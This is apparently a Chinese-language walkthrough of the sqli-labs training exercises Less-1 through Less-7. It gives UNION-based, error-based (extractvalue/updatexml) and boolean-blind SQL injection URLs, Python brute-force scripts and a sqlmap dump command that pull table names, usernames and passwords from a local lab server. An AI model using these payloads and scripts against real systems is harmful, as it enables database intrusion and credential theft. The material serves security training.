Less-1
使用单引号闭合
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
如果输入$id = 1' #会把语句拼接为,'#'后面的语句被注释掉
$sql="SELECT * FROM users WHERE id='1'#' LIMIT 0,1";
只显示一行数据,使用sqlmap注入即可
Less-2
整数注入
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
输入$id = 1#,语句拼接为,‘#’后面的语句被注释掉,使用sqlmap进行注入
$sql="SELECT * FROM users WHERE id=1# LIMIT 0,1";
手动注入
http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata#
http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'#
http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name= 'users'#
http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(username,'~',password) from users #
Less-3
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
如果输入$id = 1') -- +拼接起来的语句就是,那么'-- +'后面的语句就会被注释掉
$sql="SELECT * FROM users WHERE id=('1')-- +') LIMIT 0,1";
手动注入
http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata -- +
http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema= 'security'-- +
http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users' -- +
http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,'~',password) from users -- +
Less-4
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
输入人$id = 1 ") -- +,语句拼接为
$sql="SELECT * FROM users WHERE id=("$id") -- +) LIMIT 0,1";
使用sqlmap进行注入
将文件保存下来,进行注入
手工注入
http://192.168.8.1/sqli/sqli/Less-4/?id= 1 ") order by 4 -- +
http://192.168.8.1/sqli/sqli/Less-4/?id= -1 ") union select 1,2,group_concat(schema_name) from information_schema.schemata -- +
http://192.168.8.1/sqli/sqli/Less-4/?id= -1 ") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' -- +
http://192.168.8.1/sqli/sqli/Less-4/?id= -1 ") union select 1,2,group_concat(username,'~',password) from users -- +
Less-5
盲注
可以发现如果select查找的数据为空则输出“错误”,否则输出“正确”。通过这一点使用bp进行爆破
如果and后面连接的布尔值为0,则输出错误的,如果连接的布尔值为1,这输出正确的。
我们不妨构造语句,if(length(database())=3,1,0)
通过这个语句可以判断数据库名字的长度
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and if(substr(database(),1,1)='s',1,0) -- +
查看表的长度
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema = 'security'))=10,1,0) -- +
爆表
import requests
flag = "";
for i in range(1,30):
for j in range(1,128):
url='http://192.168.8.1/sqli/sqli/Less-5/?id=1%27%20and%20if(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27),{},1))={},1,0)%20--%20+'.format(i,j);
tmp_text = requests.get(url).content.decode("utf=-8", "ignore");
#print(tmp_text)
if '正确的' in tmp_text:
flag += chr(j);
print(flag)
爆列的长度
爆列名
import requests
flag = "";
for i in range(1,193):
for j in range(1,128):
url='http://192.168.8.1/sqli/sqli/Less-5/?id=1%27%20and%20if(ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%20%27users%27),{},1))={},1,0)%20--%20+'.format(i,j);
tmp_text = requests.get(url).content.decode("utf=-8", "ignore");
#print(tmp_text)
if '正确的' in tmp_text:
flag += chr(j);
print(flag)
爆表名
import requests
flag = "";
for i in range(1,193):
for j in range(1,128):
url="http://192.168.8.1/sqli/sqli/Less-5/?id=1' and if(ascii(substr((select group_concat(password,'~',username) from users),{},1))={},1,0) -- +".format(i,j);
tmp_text = requests.get(url).content.decode("utf=-8", "ignore");
#print(tmp_text)
if '正确的' in tmp_text:
flag += chr(j);
print(flag)
用sqlmap
python sqlmap.py -u http://192.168.8.1/sqli/sqli/Less-5/?id=1 --dump -D security -T users -C password,username
Less5还可以使用报错注入 ,可以发现如果我们输入错误的话,会将错误信息给输出
这里我们使用xpath语法错误导致的报错注入,这里主要使用的是extractvalue和updatexml两个函数
语法:extractvalue(xml_document,Xpath_string)
SQL> set linesize 300;
SQL> select * from dbmgr.xmldemo;
A B
---------- -------------------------------------------------------------------------------------------------------------
6 <A>3</A>
SQL> select EXTRACTVALUE(xmltype(B),'/A') from dbmgr.xmldemo;EXTRACTVALUE(XMLTYPE(B),'/A')
------------------------------------------------------------------------------------------------------------------------
3
第二个参数是要求符合xpath语法的字符串,如果不满足要求,则会发生报错,并将我们查询的结果返回在报错信息中。
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema = 'security'))) -- +
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name= 'users'))) -- +
可以看到这里是存在问题的,extractvalue只能显示32个字符,使用substr进行截取即可
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',substr((select group_concat(column_name) from information_schema.columns where table_name= 'users'),32,32))) -- +
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',substr((select group_concat(username,'~',password) from users),96,32))) -- +
updatexml和extractvalue其实差不多,但是updatexml具有更新的含义,他的参数是updatexml(xml_document,Xpath_string,new_string),new_string是替换的新值
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and updatexml(1,concat('~',(select group_concat(username,'~',password) from users)),1) -- +
Less-6
同Less-5差不多,但是他这里有双引号闭合
使用extractvalue进行报错注入
1" and extractvalue(1,concat('~',database()))-- +
1" and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')))-- +
1" and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')))-- +
?id=1" and extractvalue(1,concat('~',substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,32)))-- +
?id=1" and extractvalue(1,concat('~',substr((select group_concat(username,'~',password) from users),1,32)))-- +
Less-7
没办法使用报错注入了
但是可以使用布尔盲注
import requests
flag = "";
for i in range(1,193):
for j in range(1,128):
url="http://192.168.8.1/sqli/sqli/Less-7/?id=1')) and if(ascii(substr((select group_concat(username,'~',password) from users),{},1))={},1,0) --+".format(i,j);
tmp_text = requests.get(url).content.decode("utf=-8", "ignore");
#print(tmp_text)
if 'Use' in tmp_text:
flag += chr(j);
print(flag)